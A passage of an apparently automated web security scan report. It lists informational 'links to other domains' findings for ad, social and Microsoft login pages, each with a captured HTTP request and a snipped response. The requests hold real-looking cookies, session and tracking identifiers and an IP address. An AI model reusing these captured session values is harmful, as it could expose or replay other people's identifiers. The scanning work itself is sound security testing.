Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:00:51 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&amp;cver=1">here</A>
...[SNIP]...

15.12. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&amp;user=CAESECFrKvBlT-cBj-xM8B2ECfY&amp;cver=1">here</A>
...[SNIP]...

15.13. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/two_column/library/global.5efc6eff.css" media="all">
<!--[if IE 7]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://cdn4.diggstatic.com/css/two_column/App_Submission/index.53cd0655.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

15.14. http://go.microsoft.com/fwlink/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /fwlink/?LinkId=209578 HTTP/1.1
Host: go.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:24 GMT
Location: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_HP_US_BL_BuyMS
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:21:23 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_HP_US_BL_BuyMS">here</a>.</h2>
</body></html>

15.15. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:55:04 GMT
Server: cafe
Cache-Control: private
Content-Length: 3735
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/acunetix_reports/reports/addthiscom/dom-based-xss-reflected-cross-site-scripting-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dperformersoft.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE9qEkJPtaPJddJXIdWXI6rd1BPFQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js"></script>
...[SNIP]...

15.16. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 119983

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureH
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">&copy; 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

15.17. http://live.zune.net/signin.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.zune.net
Path:   /signin.ashx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fMOVIES%2f0%2f34FA18EC-ECDA-4609-BE85-CE80D58C3842%3ftarget%3dweb HTTP/1.1
Host: live.zune.net
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; lastCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940314388:ss=1309940283855

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309960756&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 13:59:16 GMT
Content-Length: 568

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309960756&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&amp;lc=1033&amp;cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&amp;id=75046">here</a>
...[SNIP]...

15.18. http://live.zune.net/signin.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.zune.net
Path:   /signin.ashx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fhome HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309961344&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&id=75046
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S802
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 432

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309961344&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&amp;lc=1033&amp;cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&amp;id=75046">here</a>
...[SNIP]...

15.19. http://live.zune.net/signin.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.zune.net
Path:   /signin.ashx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fMOVIES%2f0%2f34FA18EC-ECDA-4609-BE85-CE80D58C3842%3ftarget%3dweb HTTP/1.1
Host: live.zune.net
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; lastCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940314388:ss=1309940283855

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951237&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:20:37 GMT
Content-Length: 568

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309951237&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&amp;lc=1033&amp;cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&amp;id=75046">here</a>
...[SNIP]...

15.20. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1; MSPRequ=lt=1309950913&co=1&id=73625; MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16917
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 13:58:08 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309960748&co=1&id=75046; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-bf6316c0-d399-403e-a23b-be0acd8ba11f; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1O47 V: 0
Date: Wed, 06 Jul 2011 13:59:08 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1O47 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<html dir="ltr"><head><meta http-equiv="Content-T
...[SNIP]...
<td colspan="3"><iframe src="https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="260" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe>
...[SNIP]...
<td valign="top" class="css9993"><iframe src="https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="90" height="390" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe>
...[SNIP]...
<td rowspan="3" valign="top"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071"><img src="images/LiveID16.gif?x=11.0.18163.0" alt="Windows Live ID" border="0" id="i2033" class="css0189"/>
...[SNIP]...
<td class="css0175"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071">Windows Live ID</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&vv=1100&mkt=EN-US&lc=1033&id=10" target="_top" id="i1081">Account Services</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/PPTOU.srf?ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1309951117%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttps:%252F%252Flive.zune.net%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26cb%3DB001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26id%3D75046%26vv%3D1100%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85